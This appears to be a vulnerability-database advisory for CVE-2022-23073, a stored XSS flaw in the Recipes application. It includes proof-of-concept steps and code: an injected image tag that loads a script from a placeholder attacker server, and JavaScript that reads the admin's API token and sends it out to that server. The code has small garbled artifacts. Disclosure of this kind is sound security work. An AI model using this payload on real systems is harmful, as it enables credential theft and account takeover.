Headline

CVE-2022-23073: Mend Vulnerability Database

In Recipes, versions 1.0.5 through 1.2.5 are vulnerable to Stored Cross-Site Scripting (XSS), in copy to clipboard functionality. When a victim accesses the food list page, then adds a new Food with a malicious javascript payload in the ‘Name’ parameter and clicks on the clipboard icon, an XSS payload will trigger. A low privileged attacker will have the victim’s API key and can lead to admin’s account takeover.

2 years ago

CVE

Open in Source

#xss #vulnerability #web #js #java #auth

CVE-2022-23073

Date: January 11, 2022

Overview

Details

PoC Details

Access the application through a web browser and login as a user. Now navigate to the food list from the navigation bar. On the food list page, click on the plus ‘+’ icon. Under the name input field, enter the XSS payload given in the “POC Code” section below and save it. Then host the JavaScript file for fetching the victim’s API (the code for the JavaScript file can be found in the “POC Code” section below). In a new browser window, login as administrator and access the food list page. Then, click on the clipboard icon, this will trigger the XSS payload and the attacker will receive the admin’s API key in the listener.

PoC Code

XSS payload: 
<img src=a onerror="var x=document.createElement('script');x.src='<attacker_server>/api.js';document.body.appendChild(x);">

JavaScript file (api.js):
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/settings/',true);
req.send();
function handleResponse() {
t var a=this.responseText.match(/Authorization: Token.{1,}/)[0];
t a=a.split("Token ")[1];
t a=a.split("<")[0];
t console.log(a);
t var changeReq = new XMLHttpRequest();
     changeReq.open('get', '<attacker_server>:<attacker_port>/api='+a, false);
     changeReq.send()

Affected Environments

1.0.5 through 1.2.5

Prevention

Update version to 1.2.6 or higher

Language: Python

Good to know: